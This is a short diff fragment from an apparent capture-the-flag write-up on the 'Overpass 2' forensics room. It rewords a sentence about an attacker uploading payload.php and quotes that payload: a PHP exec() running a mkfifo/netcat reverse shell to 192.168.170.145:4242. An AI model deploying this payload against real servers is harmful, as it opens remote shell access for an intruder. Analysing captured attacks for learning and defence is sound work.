RG9n/RG9n.github.io/write-ups/overpass2hacked.md

 -----------------------------1809049028579987031515260006--
 ```

-With this stream we can see they used upload.php to upload payload.php along with the payload which appears to be a shell using netcat.
+With this stream we can see they used upload.php to upload their payload, payload.php using netcat.

 ```
 <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>